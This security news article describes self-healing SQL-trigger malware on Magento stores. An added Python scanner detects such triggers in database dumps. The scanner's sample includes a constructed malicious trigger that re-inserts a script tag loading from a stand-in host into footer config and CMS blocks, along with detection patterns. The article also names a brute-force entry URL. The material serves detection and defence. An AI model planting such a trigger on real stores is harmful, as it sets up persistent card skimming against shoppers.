Self-healing malware found targeting Magento stores

Recently, Jeroen Boersma found a new strain of malware attacking online stores built on the Magento platform. The malware can heal itself using code hidden in the store's database. It is not the first malware to rely on hidden code, but it is the first one written in SQL.

The malware starts executing whenever a user places a new order. At that moment a malicious database trigger (a set of automated SQL operations, also known as a stored procedure) runs before Magento assembles the PHP code and renders the page.

The trigger checks whether the malware's malicious JavaScript is still present in the store's header, footer, and copyright section. In addition, it checks various Magento CMS blocks where the malicious code may also reside.

If it finds no trace of its JavaScript, the trigger contains instructions that re-insert the code into the site's source, via a series of SQL operations.

Willem de Groot, who analyzed the malware, said that malware had been stored in databases before, but only as text: you could scan a dump of your database and know whether it contained anything malicious. This malware, however, is actually executed inside the database. It is the first malware written in SQL.
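Because the persistence mechanism lives in a trigger rather than in a file, a file-system scan never sees it; the trigger definitions themselves have to be reviewed. The script below is an added example, not code from the article or from the researchers it cites: it parses the trigger definitions out of a `mysqldump --triggers` style dump and flags any trigger that writes into the tables Magento renders page HTML from, or that embeds a `<script>` tag. The sample dump, trigger names and the `example.invalid` URL are constructed for the example; the table names (`core_config_data`, `cms_block`, `cms_page`, `sales_order`, `sales_flat_order`) are the usual Magento 2 / Magento 1 names and are an assumption about the target schema. On a live database the same information can be pulled with `SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT FROM INFORMATION_SCHEMA.TRIGGERS WHERE TRIGGER_SCHEMA = DATABASE();` and fed to the same checks.

```python
import re

# Constructed sample in the shape mysqldump --triggers emits. One benign audit
# trigger and one trigger that behaves like the article describes: on a new
# order it checks whether a script tag is still in the footer config and CMS
# block and re-inserts it if not. The script URL is a reserved .invalid domain.
SAMPLE_DUMP = r"""
DELIMITER ;;
/*!50003 CREATE*/ /*!50017 DEFINER=`magento`@`localhost`*/ /*!50003 TRIGGER `order_audit_after_insert` AFTER INSERT ON `sales_order` FOR EACH ROW BEGIN
  INSERT INTO `order_audit_log` (`order_id`, `created_at`) VALUES (NEW.entity_id, NOW());
END */;;
/*!50003 CREATE*/ /*!50017 DEFINER=`magento`@`localhost`*/ /*!50003 TRIGGER `after_order_insert` AFTER INSERT ON `sales_order` FOR EACH ROW BEGIN
  IF (SELECT COUNT(*) FROM core_config_data WHERE path = 'design/footer/absolute_footer'
      AND value LIKE '%example.invalid%') = 0 THEN
    UPDATE core_config_data SET value = CONCAT(value, '<script src="https://example.invalid/s.js"></script>')
      WHERE path = 'design/footer/absolute_footer';
  END IF;
  UPDATE cms_block SET content = CONCAT(content, '<script src="https://example.invalid/s.js"></script>')
      WHERE identifier = 'footer_links' AND content NOT LIKE '%example.invalid%';
END */;;
DELIMITER ;
"""

# Tables Magento reads page-level HTML from (assumption: Magento 2 schema;
# Magento 1 also kept header/footer/copyright in core_config_data).
CONTENT_TABLES = {"core_config_data", "cms_block", "cms_page"}
# Order tables for Magento 2 and Magento 1 respectively.
ORDER_TABLES = {"sales_order", "sales_flat_order"}

# mysqldump wraps each trigger in version comments and ends it with the ';;'
# delimiter; the body is captured lazily up to the first ';;'.
TRIGGER_RE = re.compile(
    r"TRIGGER\s+`?(?P<name>\w+)`?\s+(?P<timing>BEFORE|AFTER)\s+"
    r"(?P<event>INSERT|UPDATE|DELETE)\s+ON\s+`?(?P<table>\w+)`?\s+"
    r"FOR\s+EACH\s+ROW\s+(?P<body>.*?)(?:\*/)?\s*;;",
    re.IGNORECASE | re.DOTALL,
)
# Statements that modify a table, with the table name captured.
WRITE_RE = re.compile(r"\b(?:UPDATE|INSERT\s+INTO)\s+`?(\w+)`?", re.IGNORECASE)
# Markers of HTML/JS being assembled inside SQL.
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:|eval\s*\(|fromCharCode|atob\s*\(", re.IGNORECASE)


def parse_triggers(dump_text):
    """Return a list of dicts (name, timing, event, table, body) for every trigger in the dump."""
    triggers = []
    for m in TRIGGER_RE.finditer(dump_text):
        t = m.groupdict()
        t["body"] = t["body"].strip()
        triggers.append(t)
    return triggers


def assess(trigger):
    """Return a list of reasons this trigger looks like content-reinfection logic (empty if none)."""
    reasons = []
    written = {tbl.lower() for tbl in WRITE_RE.findall(trigger["body"])}
    touched = sorted(written & CONTENT_TABLES)
    if touched:
        reasons.append("writes_content_table:" + ",".join(touched))
    if SCRIPT_RE.search(trigger["body"]):
        reasons.append("embeds_script")
    # Firing on order creation alone is normal (audit triggers do it); only in
    # combination with the findings above does it match the described behaviour.
    if reasons and trigger["table"].lower() in ORDER_TABLES:
        reasons.append("fires_on_order_table")
    return reasons


def scan_dump(dump_text):
    """Map trigger name -> reasons for every trigger that raised at least one reason."""
    findings = {}
    for t in parse_triggers(dump_text):
        reasons = assess(t)
        if reasons:
            findings[t["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in scan_dump(SAMPLE_DUMP).items():
        print(f"{name}: {', '.join(reasons)}")
```

Legitimate triggers that write to `core_config_data` or `cms_block` are rare in a Magento store, so any hit deserves a manual read of `ACTION_STATEMENT`; a trigger that is unknown to the shop's own deployment tooling should be dropped and the affected config rows and CMS blocks restored from a known-good backup.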

Common Magento malware has JavaScript and PHP components responsible for stealing customers' card details. The new malware is written in SQL, which helps it survive as long as possible, and it attacks the database rather than the e-commerce application.

The malware appears to infect databases following brute-force attacks on the /rss/catalog/notifystock/ URL, even on fully patched shops.